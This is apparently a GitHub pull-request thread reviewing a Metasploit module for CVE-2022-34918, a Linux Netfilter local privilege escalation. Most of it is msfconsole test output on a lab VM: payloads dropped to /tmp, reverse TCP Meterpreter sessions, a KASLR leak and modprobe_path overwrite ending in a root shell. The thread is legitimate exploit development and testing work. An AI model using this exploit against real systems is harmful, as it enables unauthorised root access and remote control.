I would recommend extracting and creating a LICENSE file so github will recognize it in your repository stats.

Done, I've added LICENSE.md.

red0xff avatar Sep 06 '22 14:09 red0xff

I was unable to get this to work on Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw: 
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >

bwatters-r7 avatar Sep 06 '22 21:09 bwatters-r7

I was unable to get this to work on Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw: 
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >

img It worked for me on '5.11.0-41-generic, sure, it doesn't have the best success rate, but it's still decent, and it works. (If it hangs like that, reboot the VM, get a session again, and test the module again).

(Tested on Ubuntu Server with that kernel version)

red0xff avatar Sep 07 '22 21:09 red0xff

After about 10 attempts and 5 reboots, I got a session:

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4545 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/7MhKy' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/A7FHgU' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created

[*] Meterpreter session 6 opened (10.5.135.101:4545 -> 10.5.134.179:41252) at 2022-09-08 08:57:01 -0500

[-] Failed to delete /tmp/7MhKy: Operation timed out.
[-] Failed to delete /tmp/A7FHgU: Operation timed out.
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >

bwatters-r7 avatar Sep 08 '22 14:09 bwatters-r7

Hi, is there something else missing ? We would love to see this module landed 🤗

randorisec avatar Sep 27 '22 16:09 randorisec

I need to get it to work again....

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/DRXksAxm9' (765816 bytes) ...
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 4 opened (10.5.135.101:4567 -> 10.5.134.179:58040) at 2022-09-27 15:55:16 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 4
session => 4
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Qb7pg88i' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Thi6a' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 5 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Meterpreter session 5 is not valid and will be closed
[-] Failed to delete /tmp/Qb7pg88i: Operation timed out.
[-] Failed to delete /tmp/Thi6a: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 4 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 6 opened (10.5.135.101:4567 -> 10.5.134.179:34242) at 2022-09-27 15:57:19 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 6
session => 6
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/U2tRChNB' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/WOqouFDu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #5
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[-] Exploit has failed
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 7 opened (10.5.135.101:4567 -> 10.5.134.179:34592) at 2022-09-27 15:59:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/5XWtO40CI' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/kBXUCN8Zu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/5XWtO40CI: Operation timed out.
[-] Failed to delete /tmp/kBXUCN8Zu: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 2 closed.  Reason: Died
[*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:43904) at 2022-09-27 16:04:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/3AluGYr' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/sUKx6SW7' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 9 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/3AluGYr: Operation timed out.
[-] Failed to delete /tmp/sUKx6SW7: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 8 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 10 opened (10.5.135.101:4567 -> 10.5.134.179:57210) at 2022-09-27 16:09:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 10
session => 10
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Hf5kkOcpf' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Hx2Wjrwlr' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/Hf5kkOcpf: Operation timed out.
[*] Meterpreter session 9 opened (10.5.135.101:4444 -> 127.0.0.1) at 2022-09-27 16:10:12 -0500
[-] Failed to delete /tmp/Hx2Wjrwlr: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 10 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 11 opened (10.5.135.101:4567 -> 10.5.134.179:57966) at 2022-09-27 16:11:26 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 11
session => 11
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/8JKI9wK' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/K7eqJ2U' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/8JKI9wK: Operation timed out.
[-] Failed to delete /tmp/K7eqJ2U: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 11 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 12 opened (10.5.135.101:4567 -> 10.5.134.179:50556) at 2022-09-27 16:15:20 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 12
session => 12
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/sEEAde' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/fswYluB' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/sEEAde: Operation timed out.
[-] Failed to delete /tmp/fswYluB: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > show options

Module options (exploit/linux/local/netfilter_nft_set_elem_init_privesc):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMPILE    Auto             yes       Compile on target (Accepted: Auto, True, False)
   MAX_TRIES  5                yes       Number of times to execute the exploit
   SESSION    12               yes       The session to run this module on


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 12 closed.  Reason: Died

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 13 opened (10.5.135.101:4567 -> 10.5.134.179:54832) at 2022-09-27 16:18:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 13
session => 13
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/tV6ZpfjxdR' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/b4WILWg9w' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/tV6ZpfjxdR: Operation timed out.
[-] Failed to delete /tmp/b4WILWg9w: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 13 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 14 opened (10.5.135.101:4567 -> 10.5.134.179:50242) at 2022-09-27 16:20:06 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 14
session => 14
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/fdeA1Aj' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/YZ3vR' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/fdeA1Aj: Operation timed out.

bwatters-r7 avatar Sep 27 '22 21:09 bwatters-r7

15th time is a charm!

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 15
session => 15
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Lrarc2Y' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/dldRHofZp' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created
[*] Meterpreter session 16 opened (10.5.135.101:4444 -> 10.5.134.179:57886) at 2022-09-27 16:27:47 -0500

[-] Failed to delete /tmp/Lrarc2Y: Operation timed out.
[-] Failed to delete /tmp/dldRHofZp: Operation timed out.

meterpreter > 
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >

bwatters-r7 avatar Sep 27 '22 21:09 bwatters-r7

Release Notes

This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel

bwatters-r7 avatar Sep 27 '22 21:09 bwatters-r7